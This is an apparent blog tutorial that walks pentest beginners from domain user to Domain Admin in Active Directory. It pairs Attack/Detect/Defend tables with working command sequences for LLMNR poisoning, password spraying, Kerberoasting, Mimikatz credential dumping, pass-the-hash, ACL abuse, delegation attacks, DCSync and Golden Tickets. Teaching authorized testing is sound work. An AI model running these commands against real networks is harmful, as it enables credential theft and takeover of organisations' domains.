Active Directory (AD) is the backbone of most enterprise networks. If you’re doing internal pentests, you will encounter AD. This guide walks you through the complete attack path from a regular domain user to Domain Admin.
I’ve structured this for beginners — concepts are explained before commands, and each phase builds on the previous one.
Quick Reference
| Phase | Goal | Key Tool |
|---|---|---|
| 1. Enumeration | Map the domain | BloodHound |
| 2. Initial Access | Get first credentials | Responder, Kerbrute |
| 3. Credential Access | Get privileged creds | Rubeus, Mimikatz |
| 4. Lateral Movement | Move through network | CrackMapExec, Impacket |
| 5. Privilege Escalation | Escalate to DA | BloodHound, Rubeus |
| 6. Domain Dominance | Full compromise | Mimikatz (DCSync) |
Essential Tools: BloodHound | Rubeus | Mimikatz | Impacket | CrackMapExec
AD Fundamentals (What You Need to Know)
Before attacking AD, you need to understand what you’re attacking.
What is Active Directory?
Think of Active Directory as a phone book for a company’s network. It stores information about:
- Users — Employee accounts (john.smith, admin, etc.)
- Computers — Workstations, servers, domain controllers
- Groups — Collections of users (Domain Admins, HR, IT Support)
- Policies — Rules applied to users/computers (password policies, software restrictions)
The Domain Controller (DC) is the server that runs AD. It’s the crown jewel — compromise the DC and you own the network.
Key Concepts Explained
Domain: A network boundary managed by AD. Example: corp.local
Forest: A collection of domains that trust each other. The forest root is the top-level domain.
Trust: A relationship allowing users in one domain to access resources in another.
Kerberos: The authentication protocol AD uses. Instead of sending passwords, it uses encrypted “tickets.” Understanding Kerberos is key to many AD attacks.
Service Principal Name (SPN): An identifier for services running on the network. Accounts with SPNs are targets for Kerberoasting.
Group Policy Object (GPO): Rules pushed to computers/users. Misconfigured GPOs can give attackers admin access.
Why Attackers Target AD
- One account = access to everything — Domain Admins can access any computer
- Credentials are everywhere — Cached in memory, stored in files, transmitted on the network
- Trust relationships — Compromise one domain, pivot to others
- Misconfigurations are common — Legacy settings, overprivileged accounts, weak passwords
Phase 1: Enumeration
TL;DR: Before you attack, map the domain. BloodHound shows you the path to Domain Admin.
What you need:
- Domain user credentials (any user works)
- Network access to the Domain Controller
| Attack | Detect | Defend |
|---|---|---|
| Enumerate users/groups via LDAP | Alert on mass LDAP queries from non-DCs | Limit anonymous LDAP binds |
| Run BloodHound collector | Detect SharpHound process/signatures | Monitor for enumeration tools |
| Find Kerberoastable accounts | Log SPN enumeration queries | Use Group Managed Service Accounts (gMSAs) |
| Map local admin access | Monitor SMB session enumeration | Remove unnecessary local admin rights |
Testing Checklist
- Confirm domain connectivity
- Run BloodHound/SharpHound collector
- Identify Domain Admins group members
- Find Kerberoastable accounts (users with SPNs)
- Find AS-REP Roastable accounts (no pre-auth required)
- Check where your user has local admin
- Enumerate network shares
Commands
Step 1: Confirm you’re on the domain
# Check current domain
systeminfo | findstr /B "Domain"
# Find domain controller
nltest /dsgetdc:corp.local
# Current user info
whoami /allStep 2: Basic enumeration with PowerShell
# List all domain users
net user /domain
# List all domain groups
net group /domain
# Get Domain Admins
net group "Domain Admins" /domain
# Get domain password policy
net accounts /domainStep 3: Run BloodHound collector
# SharpHound (C# collector)
.\SharpHound.exe -c All
# PowerShell version
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
# From Linux with bloodhound-python
bloodhound-python -u 'user' -p 'password' -d corp.local -ns 10.10.10.1 -c AllExpected output: ZIP file containing JSON files. Import into BloodHound GUI.
Step 4: Find quick wins in BloodHound
# In BloodHound GUI, run these queries:
- "Find all Domain Admins"
- "Find Shortest Paths to Domain Admins"
- "Find Kerberoastable Users"
- "Find AS-REP Roastable Users"
- "Find Computers where Domain Users are Local Admin"Step 5: PowerView enumeration (if available)
Import-Module .\PowerView.ps1
# Get domain info
Get-Domain
# Find domain admins
Get-DomainGroupMember -Identity "Domain Admins"
# Find Kerberoastable users
Get-DomainUser -SPN
# Find AS-REP roastable users
Get-DomainUser -PreauthNotRequired
# Find computers where current user has admin
Find-LocalAdminAccessPhase 2: Initial Access / Credential Harvesting
TL;DR: Get your first set of credentials. LLMNR poisoning and password spraying are your friends.
What you need:
- Network access (same subnet preferred for LLMNR)
- Patience for password spraying
| Attack | Detect | Defend |
|---|---|---|
| LLMNR/NBT-NS poisoning | Alert on LLMNR/NBT-NS traffic | Disable LLMNR and NBT-NS via GPO |
| Password spraying | Alert on multiple failed logins across users | Account lockout policies, MFA |
| AS-REP Roasting | Log Kerberos AS-REQ without pre-auth | Require pre-authentication for all accounts |
Testing Checklist
- Run Responder for LLMNR/NBT-NS poisoning
- Attempt password spraying with common passwords
- Try AS-REP Roasting for accounts without pre-auth
- Check for default credentials
- Look for credentials in shares/files
Commands
LLMNR/NBT-NS Poisoning with Responder
What is this? When a Windows computer can’t resolve a hostname, it broadcasts to the network asking “Who is SERVER01?” Responder answers “That’s me!” and captures the authentication attempt.
# Start Responder (run as root)
sudo responder -I eth0 -dwv
# Wait for hashes... they'll appear as NTLMv2
# Example captured hash:
# user::CORP:1122334455667788:AAA...BBB:0101000000000000...Crack captured hashes
# With hashcat (NTLMv2 = mode 5600)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
# With john
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txtPassword Spraying
What is this? Try one password against many accounts. Avoids lockouts by staying under the threshold.
# With kerbrute (fast, no lockouts if password is wrong)
./kerbrute passwordspray -d corp.local users.txt 'Spring2024!'
# With CrackMapExec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Spring2024!' --continue-on-success
# With Spray (PowerShell)
Invoke-SprayPassword -UserList users.txt -Password 'Spring2024!' -Domain corp.localCommon passwords to try:
SeasonYear! (Spring2024!, Winter2023!)
CompanyName123!
Password1
Welcome1
<Company>2024!AS-REP Roasting
What is this? If an account doesn’t require Kerberos pre-authentication, anyone can request an encrypted ticket and crack it offline.
# With Impacket (from Linux)
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat
# With Rubeus (from Windows)
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txtCrack AS-REP hashes
# Mode 18200 for AS-REP
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txtPhase 3: Credential Access
TL;DR: Now that you have access, get better credentials. Kerberoasting and credential dumping are key.
What you need:
- Domain user credentials
- Local admin on at least one machine (for credential dumping)
| Attack | Detect | Defend |
|---|---|---|
| Kerberoasting | Alert on high volume TGS requests | Use long, complex service account passwords; gMSAs |
| LSASS credential dumping | Detect Mimikatz/LSASS access | Enable Credential Guard, LSA protection |
| SAM database extraction | Monitor for shadow copy creation | Restrict local admin rights |
| Credential hunting in shares | Audit sensitive file access | Regular credential hygiene audits |
Testing Checklist
- Kerberoast all service accounts with SPNs
- Dump credentials from LSASS (if local admin)
- Extract SAM database
- Search shares for passwords/configs
- Check for GPP passwords (legacy)
Commands
Kerberoasting
What is this? Any domain user can request a Kerberos service ticket for any account with an SPN. The ticket is encrypted with the service account’s password — crack it offline!
# With Impacket (from Linux)
GetUserSPNs.py corp.local/user:password -dc-ip 10.10.10.1 -request -outputfile kerberoast.txt
# With Rubeus (from Windows)
.\Rubeus.exe kerberoast /outfile:kerberoast.txt
# With PowerView
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty HashCrack Kerberos tickets
# Mode 13100 for Kerberoastable tickets
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txtCredential Dumping with Mimikatz
Requires local admin on the target machine
# Dump credentials from memory (LSASS)
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
# Expected output: Usernames, NTLM hashes, and possibly cleartext passwords!
# Dump local SAM database
.\mimikatz.exe
privilege::debug
lsadump::samCredential Dumping with CrackMapExec
# Dump SAM (local accounts)
crackmapexec smb 10.10.10.50 -u admin -p 'password' --sam
# Dump LSA secrets
crackmapexec smb 10.10.10.50 -u admin -p 'password' --lsa
# Dump LSASS
crackmapexec smb 10.10.10.50 -u admin -p 'password' -M lsassyCredential Dumping with secretsdump (from Linux)
# Remote dump with admin creds
secretsdump.py corp.local/admin:password@10.10.10.50
# With NTLM hash (pass-the-hash)
secretsdump.py corp.local/admin@10.10.10.50 -hashes :NTLM_HASH_HERESearch for Credentials in Shares
# Find readable shares
Find-DomainShare -CheckShareAccess
# Search for password files
findstr /si password \\server\share\*.txt *.xml *.config
# Common locations:
# - SYSVOL\*\Policies\*\Groups.xml (GPP passwords - MS14-025)
# - Scripts and batch files
# - Configuration filesGPP Passwords (Legacy Systems)
# With Impacket
Get-GPPPassword.py corp.local/user:password@10.10.10.1
# Manual search
findstr /S /I cpassword \\corp.local\sysvol\corp.local\policies\*.xmlPhase 4: Lateral Movement
TL;DR: Use stolen credentials to move through the network. Pass-the-Hash lets you authenticate without knowing passwords.
What you need:
- Valid credentials (password or NTLM hash)
- Knowledge of where those credentials work
| Attack | Detect | Defend |
|---|---|---|
| Pass-the-Hash (PtH) | Alert on NTLM auth from unusual sources | Disable NTLM where possible, use Credential Guard |
| Pass-the-Ticket (PtT) | Monitor for TGT reuse from multiple IPs | Short ticket lifetimes |
| PSExec/WMI/WinRM execution | Log remote process creation | Restrict remote admin tools |
| Over-Pass-the-Hash | Detect Kerberos TGT requests with NTLM auth | Credential Guard, monitoring |
Testing Checklist
- Identify where your credentials have admin access
- Attempt Pass-the-Hash to new targets
- Use PSExec/WMI/WinRM for remote execution
- Dump credentials on each new machine
- Repeat until you find Domain Admin credentials
Commands
Find Where You Have Access
# With CrackMapExec (spray creds across network)
crackmapexec smb 10.10.10.0/24 -u user -p 'password'
# Look for (Pwn3d!) in output = you have admin
# With NTLM hash
crackmapexec smb 10.10.10.0/24 -u user -H 'NTLM_HASH'Pass-the-Hash
What is this? NTLM authentication uses a hash, not the password. If you have the hash, you can authenticate without knowing the password.
# With Impacket psexec
psexec.py corp.local/admin@10.10.10.50 -hashes :NTLM_HASH_HERE
# With Impacket wmiexec (more stealthy)
wmiexec.py corp.local/admin@10.10.10.50 -hashes :NTLM_HASH_HERE
# With CrackMapExec (execute command)
crackmapexec smb 10.10.10.50 -u admin -H 'NTLM_HASH' -x 'whoami'
# With evil-winrm
evil-winrm -i 10.10.10.50 -u admin -H 'NTLM_HASH'Pass-the-Ticket
What is this? Use a stolen Kerberos ticket to authenticate as that user.
# In Mimikatz - export tickets
sekurlsa::tickets /export
# Import ticket into current session
kerberos::ptt ticket.kirbi
# Verify ticket loaded
klistOver-Pass-the-Hash (OPTH)
What is this? Use an NTLM hash to request a Kerberos ticket. Useful when NTLM is blocked but Kerberos isn’t.
# With Mimikatz
sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:powershell.exe
# With Rubeus
.\Rubeus.exe asktgt /user:admin /rc4:NTLM_HASH /pttRemote Execution Methods
# PSExec (noisy, creates service)
psexec.py corp.local/admin:password@10.10.10.50
# WMIExec (stealthier, uses WMI)
wmiexec.py corp.local/admin:password@10.10.10.50
# SMBExec (uses SMB, no service)
smbexec.py corp.local/admin:password@10.10.10.50
# ATExec (uses scheduled tasks)
atexec.py corp.local/admin:password@10.10.10.50 'whoami'
# WinRM (if enabled)
evil-winrm -i 10.10.10.50 -u admin -p 'password'Lateral Movement Flow
1. Find where creds work: crackmapexec smb 10.10.10.0/24 -u user -p pass
2. Get shell: wmiexec.py user:pass@target
3. Dump creds: secretsdump.py user:pass@target
4. Find new targets: repeat step 1 with new creds
5. Continue until Domain Admin foundPhase 5: Privilege Escalation
TL;DR: Escalate from regular admin to Domain Admin using ACL abuse, delegation attacks, or BloodHound paths.
What you need:
- Admin on at least one domain-joined machine
- BloodHound data to find attack paths
| Attack | Detect | Defend |
|---|---|---|
| ACL abuse (GenericAll, WriteDACL) | Monitor AD object permission changes | Regular ACL audits, least privilege |
| Unconstrained delegation | Alert on TGT forwarding | Use constrained delegation, Protected Users group |
| Constrained delegation abuse | Monitor S4U2Self/S4U2Proxy requests | Limit delegation, use RBCD carefully |
| GPO abuse | Alert on GPO modifications | Restrict GPO edit permissions |
Testing Checklist
- Check BloodHound for attack paths to Domain Admin
- Look for ACL misconfigurations (GenericAll, WriteDACL, etc.)
- Find computers with unconstrained delegation
- Check for constrained delegation abuse opportunities
- Look for GPO modification rights
Commands
BloodHound Attack Paths
Run these queries in BloodHound GUI:
- "Shortest Paths to Domain Admins from Owned Principals"
- "Find Principals with DCSync Rights"
- "Find Computers with Unconstrained Delegation"
- "Shortest Paths to High Value Targets"ACL Abuse with PowerView
What is this? If you have write permissions on a user/group object, you can modify it to give yourself access.
# Find objects you can modify
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "youruser"}
# GenericAll on user = reset their password
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force)
# GenericAll on group = add yourself to it
Add-DomainGroupMember -Identity "Domain Admins" -Members youruser
# WriteDACL = give yourself GenericAll first
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity youruser -Rights AllUnconstrained Delegation Attack
What is this? Computers with unconstrained delegation store TGTs of connecting users. If an admin connects, you get their ticket.
# Find computers with unconstrained delegation
Get-DomainComputer -Unconstrained
# Monitor for incoming tickets (on compromised server with unconstrained delegation)
.\Rubeus.exe monitor /interval:5
# Or use Mimikatz to dump tickets
sekurlsa::ticketsConstrained Delegation Attack
What is this? If a service account can delegate to another service, you can impersonate any user to that service.
# Find accounts with constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# With Rubeus - request ticket as admin to target service
.\Rubeus.exe s4u /user:svc_sql /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/dc01.corp.local /pttResource-Based Constrained Delegation (RBCD)
What is this? If you can write to a computer’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute, you can impersonate any user to that computer.
# You need: GenericAll/GenericWrite on a computer object + a machine account you control
# Create machine account (if you have MachineAccountQuota > 0)
New-MachineAccount -MachineAccount YOURPC -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)
# Set RBCD
Set-ADComputer targetserver -PrincipalsAllowedToDelegateToAccount YOURPC$
# Get ticket
.\Rubeus.exe s4u /user:YOURPC$ /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/targetserver.corp.local /pttPhase 6: Domain Dominance
TL;DR: You’re Domain Admin. Now extract all credentials with DCSync and establish persistence with Golden Tickets.
What you need:
- Domain Admin (or equivalent) privileges
- Access to dump from the DC
| Attack | Detect | Defend |
|---|---|---|
| DCSync | Alert on replication from non-DCs | Limit DCSync rights to DCs only |
| Golden Ticket | Detect TGTs with unusual lifetimes | Rotate krbtgt password twice, monitor |
| Silver Ticket | Detect service tickets without TGT request | Monitor for anomalous service access |
| Skeleton Key | Detect LSASS injection on DC | Monitor DC process integrity |
Testing Checklist
- Perform DCSync to dump all hashes
- Extract krbtgt hash for Golden Ticket
- Create Golden Ticket for persistence
- Document your access path for the report
Commands
DCSync Attack
What is this? Domain Controllers replicate AD data between themselves. With the right privileges (Replicating Directory Changes), you can pretend to be a DC and request all password hashes.
# From Linux with Impacket
secretsdump.py corp.local/domainadmin:password@10.10.10.1
# Dump specific user (like krbtgt)
secretsdump.py corp.local/domainadmin:password@10.10.10.1 -just-dc-user krbtgt# From Windows with Mimikatz
.\mimikatz.exe
lsadump::dcsync /domain:corp.local /all
lsadump::dcsync /domain:corp.local /user:krbtgtExpected output:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cdda88057e06a81b54e73b949b...
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f...Golden Ticket
What is this? With the krbtgt hash, you can forge Kerberos tickets for any user, including Domain Admin. This works even after password changes (until krbtgt is reset).
# Get domain SID
whoami /user
# Or: Get-DomainSID
# Create Golden Ticket with Mimikatz
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt
# Use the ticket
misc::cmd
# Now you have a cmd as Administrator# From Linux with Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator
# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@dc01.corp.localSilver Ticket
What is this? Forge a ticket for a specific service using that service account’s hash. Useful for targeted access.
# For CIFS (file shares) on DC
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:dc01.corp.local /service:cifs /rc4:MACHINE_HASH /ptt
# Now access the share
dir \\dc01.corp.local\c$Post-Domain Admin Checklist
✅ DCSync completed - all hashes extracted
✅ krbtgt hash saved for Golden Ticket
✅ Document attack path for report
✅ Screenshot evidence
✅ Note any cleartext passwords found
✅ Identify high-value targets accessedCommon Attack Paths
Here are the most common paths from domain user to Domain Admin:
Path 1: Kerberoast → Crack → Lateral → DCSync
Domain User
↓ Kerberoast service accounts
Service Account Hash
↓ Crack with hashcat
Service Account Password
↓ Service account is admin somewhere
Local Admin on Server
↓ Dump more creds, pivot
Domain Admin Credentials
↓ DCSync
All Domain HashesPath 2: LLMNR → Relay → Admin → DCSync
Network Access
↓ Responder captures hash
NTLMv2 Hash
↓ Relay to another machine (ntlmrelayx)
Local Admin Session
↓ Dump LSASS
Domain Admin Hash
↓ Pass-the-Hash to DC
Domain Admin AccessPath 3: BloodHound → ACL Abuse → Domain Admin
Domain User
↓ BloodHound enumeration
Misconfigured ACL Found
↓ GenericAll on user in Admin group
Password Reset Capability
↓ Reset password, add to DA group
Domain AdminEssential Tools
Enumeration
| Tool | Purpose | Install |
|---|---|---|
| BloodHound | AD attack path mapping | apt install bloodhound |
| SharpHound | BloodHound data collector | Download from releases |
| PowerView | PowerShell AD enumeration | Import-Module |
| ADRecon | AD enumeration to Excel | PowerShell script |
Exploitation
| Tool | Purpose | Install |
|---|---|---|
| Rubeus | Kerberos attacks | Compile or download |
| Mimikatz | Credential extraction | Download from releases |
| Impacket | Python AD tools | pip install impacket |
| CrackMapExec | Swiss army knife | apt install crackmapexec |
Initial Access
| Tool | Purpose | Install |
|---|---|---|
| Responder | LLMNR/NBT-NS poisoning | apt install responder |
| Kerbrute | Kerberos user enum/spray | Download binary |
| Spray | Password spraying | PowerShell script |
Practice Labs
Build Your Own Lab
Quick AD Lab with VMs:
- Windows Server 2019/2022 (Domain Controller)
- Windows 10/11 (Workstation)
- Kali Linux (Attacker)
Automated Lab Deployment:
- DVAD — Vulnerable AD for practice
- GOAD — Game of Active Directory
- PurpleCloud — AD lab in Azure
HackTheBox (Beginner → Advanced)
Easy:
- Forest
- Active
- Sauna
Medium:
- Cascade
- Monteverde
- Resolute
Hard:
- Blackfield
- Reel
- Mantis
TryHackMe Paths
Glossary
| Term | Definition |
|---|---|
| AD | Active Directory — Microsoft’s directory service for Windows networks |
| DC | Domain Controller — Server running AD, stores all domain data |
| DA | Domain Admin — Highest privilege group in AD |
| TGT | Ticket Granting Ticket — Kerberos ticket proving your identity |
| TGS | Ticket Granting Service — Issues service tickets |
| SPN | Service Principal Name — Identifier for services (Kerberoasting target) |
| NTLM | NT LAN Manager — Legacy authentication protocol (uses hashes) |
| Kerberos | Modern authentication protocol used by AD |
| krbtgt | Kerberos service account — its hash creates Golden Tickets |
| GPO | Group Policy Object — Rules applied to users/computers |
| ACL | Access Control List — Permissions on AD objects |
| DCSync | Attack that mimics DC replication to steal all hashes |
| PtH | Pass-the-Hash — Authenticate with NTLM hash instead of password |
| PtT | Pass-the-Ticket — Authenticate with stolen Kerberos ticket |
What’s Next
After mastering these techniques, explore:
- Azure AD attacks — Hybrid environments, cloud pivoting
- Forest/Trust attacks — Pivoting between domains
- Advanced persistence — DCShadow, AdminSDHolder abuse
- Evasion techniques — Avoiding detection during engagements
Related: Windows Privilege Escalation Guide | Linux Privilege Escalation Guide
Questions or feedback? Find me on GitHub.